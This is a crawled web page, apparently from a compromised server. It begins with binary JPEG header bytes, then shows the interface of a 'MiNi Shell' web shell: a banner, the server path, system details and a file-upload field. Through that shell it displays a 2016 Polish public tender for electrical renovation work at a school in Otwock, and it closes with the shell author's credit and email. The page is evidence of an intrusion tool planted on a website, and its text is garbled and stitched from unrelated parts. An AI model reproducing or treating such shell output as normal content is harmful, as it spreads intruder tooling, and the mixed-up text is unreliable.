JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160523/130540-N-2016.html

<p class="kh_header"><b>Otwock: Remont  instalacji elektrycznych  - etap I</b><br>
<b>Numer ogłoszenia: 130540 - 2016; data zamieszczenia: 23.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ogólnokształcących Liceum Ogólnokształcące Nr 1 im. K.I. Gałczyńskiego , ul. Gen. J. Filipowicza 9, 05-400 Otwock, woj. mazowieckie, tel. 0-22 779 31 84, faks 0-22 779 35 74.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lo.otwock.ids.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: edukacja - szkoła.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont  instalacji elektrycznych  - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont  instalacji elektrycznych  - etap I

2. Szczegółowy opis przedmiotu zamówienia określa Dokumentacja projektowa , specyfikacja techniczna wykonania i odbioru robót, przedmiar  robót.
Przedmiar określający zakres prac ma  charakter pomocniczy w celu zapoznania się z przedmiotem zamówienia  i w trakcie realizacji zamówienia nie może stanowić podstawy roszczenia wykonawcy, z tytułu informacji w nim zawartych.  
3. Przedmiot umowy musi być wykonany zgodnie z obowiązującymi przepisami, normami, warunkami technicznymi i sztuka budowlana, przepisami bhp, ppoż.
4. Planowany zakres robót budowlanych dotyczy w szczególności:
1)  Demontaże z wywiezieniem :
a)  demontaż  opraw oświetleniowych,
b) odłączenie przewodów,
c) demontaż tablic  bezpiecznikowych,
d) demontaż drzwiczek, demontaż rur,
2) Rozdzielnice :
a) wymiana wkładek,
b) aparaty elektryczne,
c) rozdzielnice prefabrykowane.
3) Wykonanie  linii zasilających:
a) ręczne przebijanie otworów,
b) ręczne wykucie bruzd,
c) położenie rur winidurowych,
d) wciąganie przewodów do rur,
e) położenie przewodów kabelkowych.
4) Wykonanie linii odbiorczych:
a) przebijanie otworów,
b) wykucie bruzd,
c) położenie rur winidurowych,
d) wciąganie przewodów do rur.
5) Przygotowanie podłoża pod osprzęt.
6) Instalacja puszek podtynkowych, łączników i przycisków.
7) Instalacja opraw oświetleniowych.
8) Instalacja opraw.
9) Instalacje aparatów elektrycznych , przycisków.
10) Instalacja wyrównania potencjałów.
11) Zrobienie bruzd, przebić.
12) Wykonanie pasów tynku.
13) Malowanie starych tynków.
14) Badania i pomiary:
a) sprawdzenie i pomiary obwodów 1 i 3-faz,
b) badanie i pomiary uziemienia,
c) pomiary natężenia oświetlenia,
d)roboty w zakresie przewodów instalacji elektrycznych,
e) roboty w zakresie opraw elektrycznych,
f)) roboty w zakresie  tablic rozdzielczych.
Szczegółowy opis przedmiotu zamówienia - określa Dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót, przedmiar  robót.
5. Zamawiający informuje, że tam, gdzie w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych , dokumentacji projektowej zostało wskazane  pochodzenie (nazwa, marka, znak towarowy, producent, dostawca, patent)  materiałów lub urządzeń lub normy, aprobaty, specyfikacje i systemy, o których mowa  w art. 30 ust 1-3 ustawy Prawo zamówień publicznych,  Zamawiający  dopuszcza ofertowanie  materiałów  lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów techniczno-eksploatacyjnych, pod względem funkcjonalnym nie gorszych od założonych  w wyżej wymienionych dokumentach. Znajdujące  się w dokumentacji postępowania znaki  towarowe lub nazwy własne wskazujące na pochodzenie  danego materiału mają wyłącznie charakter  informacyjny w celu umożliwienia wykonawcom ustalenia równoważności. Rozwiązania równoważne opisanym nie będą o gorszych właściwościach i jakości.
Wszystkie materiały, urządzenia i sprzęt niezbędny do wykonania przedmiotu zamówienia zobowiązany będzie zapewnić Wykonawca. Jakość wykonania robót oraz materiałów użytych do zrealizowania zadania powinna spełniać wymogi zawarte w szczegółowych specyfikacjach technicznych
Oznacza to , że Wykonawca  nie będzie  zobowiązany do stosowania  konkretnych wyrobów i może on zastosować inne, pod warunkiem  ich zgodności z wyrobami podanymi  w przedmiarze robót i STWiOR pod względem :
1)	 jakości materiałów,
2)	parametrów technicznych ( wytrzymałości, wydajności, trwałości, kolorystyki, itp.),
3)	charakteru użytkowego ( tożsamości funkcji)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Przewiduje się możliwość udzielenia zamówienia uzupełniającego na podstawie odrębnej umowy lub umów zawartych z Wykonawcą w trybie zamówienia z wolnej ręki, na podstawie art. 67 ust. 1 pkt. 6 Ustawy. Zamówienie uzupełniające może zostać udzielone w terminie 3 lat od dnia udzielenia zamówienia podstawowego , stanowiących nie więcej niż 50% i dotyczyć będzie zakresu:
1)  instalacyjne  roboty elektryczne- demontaże
2) roboty w zakresie  przewodów instalacji elektrycznych,
3) roboty w zakresie opraw elektrycznych
4) roboty w zakresie  tablic rozdzielczych
5) instalacyjne  roboty elektryczne - pomiary pomontażowe
Wartość zamówienia uzupełniającego nie będzie przekraczać 50% wartości zamówienia podstawowego.
Roboty te zostaną wykonane z materiałów takich, jak zostały użyte  w zamówieniu podstawowym oraz zostaną wykonane metoda taką jak użyto przy realizacji zamówienia podstawowego. 
Cena za wykonanie wymienionych robót nie wyższa niż ceny wykazane w ofercie  - kosztorysie ofertowym przekazanym przez Wykonawcę, z którym zawarta została umowa.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.31.11.00-1, 45.31.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 49.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu sposobu dokonywania  oceny spełnienia   tego warunku .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w okresie ostatnich  5 lat przed upływem  terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał  zgodnie zasadami sztuki budowlanej i prawidłowo ukończył oraz  należycie wykonał, co najmniej jedną    robotę  budowlaną dotyczącą robót elektrycznych ) o wartości nie mniejszej niż 100.000 zł brutto, która  będzie obejmowała   roboty elektryczne na kwotę 100.000żl ( mogą to być roboty elektryczne wykonywane w ramach większego zamówienia obejmującego różne branże, ale wartość robót elektrycznych w takim zamówieniu musi być nie mniejsza niż 100.000 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu sposobu dokonywania  oceny spełnienia   tego warunku .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>kierownikiem robót  - 1 osoba, posiadającym uprawnienia  budowlane do kierowania robotami budowlanymi w specjalności instalacje w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu sposobu dokonywania  oceny spełnienia   tego warunku .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający  uzna za spełniony  warunek posiadania wiedzy i doświadczenia, jeśli wykonawca wykaże, że w okresie ostatnich  5 lat przed upływem  terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał  zgodnie zasadami sztuki budowlanej i prawidłowo ukończył oraz  należycie wykonał, co najmniej jedną    robotę  budowlaną dotyczącą robót elektrycznych ) o wartości nie mniejszej niż 100.000 zł brutto która  będzie obejmowała   roboty elektryczne na kwotę 100.000żl ( mogą to być roboty elektryczne wykonywane w ramach większego zamówienia obejmującego różne branże, ale wartość robót elektrycznych w takim zamówieniu musi być nie mniejsza niż 100.000 zł brutto);</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>. Zamawiający po wyborze najkorzystniejszej oferty, a przed podpisaniem umowy (najpóźniej do dnia podpisania umowy) żąda od Wykonawcy, którego oferta została wybrana,  przedłożenia Zamawiającemu szczegółowych kalkulacji cen jednostkowych- kosztorysu ofertowego  z  wyszczególnieniem ilości, ceny jednostkowej i wartości, w rozbiciu na nakłady rzeczowe i ceny robocizny, materiałów wraz z kosztami zakupu, pracy sprzętu i transportu wszystkich pozycji na podstawie, których została obliczona cena oferty Wykonawcy. Szczegółowe kalkulacje cen jednostkowych będą stanowić załącznik do Umowy .
          5. Wykonawca, przed  podpisaniem  umowy zobowiązany będzie wnieść zabezpieczenia należytego wykonania umowy.
 6. Wykonawca, którego oferta została wybrana  po wyborze oferty w celu zawarcia umowy  w sprawie zamówienia  publicznego  zobowiązany  jest do posiadania ubezpieczenia OC z tytułu  prowadzonej działalności  gospodarczej, obejmującej swym zakresem  co najmniej szkody  powstałe w związku  z wykonaniem  robót budowlanych  i innych prac objętych przedmiotem  zamówienia  w wysokości  minimum 200.000 zł na okres  wykonania zamówienia.
7. Wykonawca, którego oferta  po wyborze oferty  w celu zawarcia umowy w sprawie zamówienia publicznego przedstawi  zamawiającemu  kopie uprawnień  budowlanych osoby wskazanej w ofercie  wraz z aktualnym zaświadczeniem właściwej izby  samorządu zawodowego, a w przypadku  osób, które uzyskały uprawnienia poza  granicami Rzeczypospolitej Polski wraz z uznaniem uprawnień  przez właściwy organ, zgodnie z ustawą z dn. 18.03.2008 r. o zasadach uznania kwalifikacji zawodowych nabytych państwach członkowskich Unii Europejskiej ( Dz.U. nr 63, poz.394).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień zawartej umowy. 
1).Zgodnie z art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza możliwość dokonywania nieistotnych zmian zawartej umowy w stosunku do treści oferty na podstawie której dokona wyboru Wykonawcy. 
Zamawiający, przewiduje również możliwość dokonania istotnej zmiany zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
2)  zmiany zakresu lub sposobu wykonania zamówienia  spowodowane zmianą dokumentacji projektowej lub technicznej przez projektanta  i zaakceptowanej przez Zamawiającego , które mogą spowodować rozszerzenie przedmiotu zamówienia.
3) konieczności zmiany, w tym w zakresie wysokości wynagrodzenia, związanej ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT) lub,
4) siły wyższej uniemożliwiającej  wykonanie przedmiotu umowy zgodnie z  ofertą i SIWZ, 
7. Zamawiający przewiduje możliwość zmiany terminu realizacji w przypadku:
1)	zaistnienia nieprzewidzianych utrudnień, związanych z konstrukcją budynku oraz w przypadku nieprzewidzianych, dodatkowych robót budowlanych,
2)	w przypadku sporządzenia protokołu konieczności na wykonanie robót koniecznych lub dodatkowych, wykonanie których stało się niezbędne do prawidłowego wykonania przedmiotu umowy  zgodnie ze sztuką budowlaną,
3) konieczności wykonania robót zamiennych, niezbędnych dla prawidłowego i zgodnego z prawem budowlanym wykonania przedmiotu umowy,
4)  wstrzymania realizacji umowy przez Zamawiającego z przyczyn leżących po jego stronie,
   5)  warunków atmosferycznych uniemożliwiających realizację robót,
   6) wystąpienia okoliczności, których  strony umowy nie były w stanie przewidzieć, pomimo 
      zachowania należytej staranności
7) w razie zaistnienia zdarzeń o charakterze działania siły wyższej, przez którą strony rozumieją klęski żywiołowe, stan wyjątkowy, działania terrorystyczne, strajk powszechny, nowe akty prawne lub decyzje właściwych władz, a także działania lub zaniechania działania organów państwowych, samorządowych lub osób trzecich uniemożliwiających terminową realizację zamówienia, o okres nie przekraczający czasu trwania przeszkody w wykonaniu zamówienia
  8)   nadzwyczajnych zdarzeń gospodarczych niezależnych od Zamawiającego , których Zamawiający  
       nie mógł przewidzieć w chwili zawarcia umowy. 
  9)   zawieszenia przez zamawiającego wykonania części lub całości robót na czas trwania  
       obiektywnej przeszkody, 
 10) błędów w dokumentacji projektowej lub innych dokumentach budowy, których usunięcie będzie  
      poprzedzać konieczność konsultacji z projektantem i naniesienia przez niego poprawek lub zmian  
      w projekcie, innych dokumentach, 
11)  jeżeli wystąpi brak możliwości wykonywania robót z powodu nie dopuszczania do ich 
       wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony 
       organ, z przyczyn niezależnych od Wykonawcy, 
12)  konieczność uzyskania dodatkowych opinii lub uzgodnień, 
13)  zmian wynikających z konieczności wykonania robót niezwiązanych bezpośrednio z przedmiotem 
 umowy i nieprzewidywalnych, których brak wykonania uniemożliwia lub utrudnia prawidłowe 
 wykonanie przedmiotu umowy, 
14) w razie udzielenia zamówienia dodatkowego zgodnie z art. 67 ust. l pkt. 5 ustawy Prawo zamówień publicznych, o okres wykonania zamówienia dodatkowego.
15) Termin zakończenia przedmiotu zamówienia może  zostać zmieniony  z uwzględnieniem  trwania przyczyny.
8. Zamawiający dopuszcza wprowadzenie zamiany materiałów i urządzeń przedstawionych w ofercie przetargowej pod warunkiem, że zmiany te będą korzystne dla Zamawiającego   Będą to, w szczególności, okoliczności:
1) konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotem umowy, przy
zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane
w dokumentacji, a wynikających ze stwierdzonych wad tej dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy,
2) powodujące poprawienie parametrów technicznych,
3) wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących 
    przepisów,
4) dodatkowo możliwa jest zmiana producenta poszczególnych materiałów i urządzeń przedstawionych w ofercie przetargowej, pod warunkiem że zmiana ta nie spowoduje obniżenia parametrów tych materiałów lub urządzeń.
9. Zmiany, o których mowa w niniejszym paragrafie muszą być każdorazowo zatwierdzone przez Zamawiającego,   na podstawie uzgodnień przeprowadzonych z projektantem.
10.  Zmiany, o których mowa w ust.   3  niniejszego paragrafu nie mogą spowodować zmiany wynagrodzenia umownego, o którym mowa w § 4 ust. 1  umowy.
11. Zmiany, dotyczące udzielenia dotychczasowemu Wykonawcy robót budowlanych, stanowiących nie więcej  niż 50%  wartości zamówienia  i podlegającego na powtórzeniu tego samego rodzaju zamówienia, które zostało przewidziane w Rozdziale VI SIWZ w ogłoszeniu.
12. Zmiany przedstawicieli Zamawiającego i Wykonawcy oraz uczestników procesu inwestycyjnego w   umowie , w szczególności kierownika budowy, pod warunkiem, że posiada ona  kwalifikacje nie   gorsze od osoby, którą zastąpi, za zgodą  Zamawiającego.
13. Zamawiający przewiduje możliwość zmiany odnośnie podwykonawstwa poprzez:
    1) wskazanie innych podwykonawców,
    2) rezygnację z podwykonawcy,
    3) wskazanie innego zakresu podwykonawstwa niż przedstawiony w ofercie,
    4) powierzyć realizację części zamówienia podwykonawcom, pomimo niewskazania  w ofercie żadnej części zamówienia  przeznaczonej do wykonania w ramach podwykonawstwa</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lo.otwock.ids.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w sekretariacie Zespołu Szkół Ogólnokształcących  w Otwocku ul. Filipowicza 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2016 godzina 11:00, miejsce: w siedzibie Zespołu Szkół Ogólnokształcących  w Otwocku ul. Filipowicza 9 w gabinecie Dyrektora..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com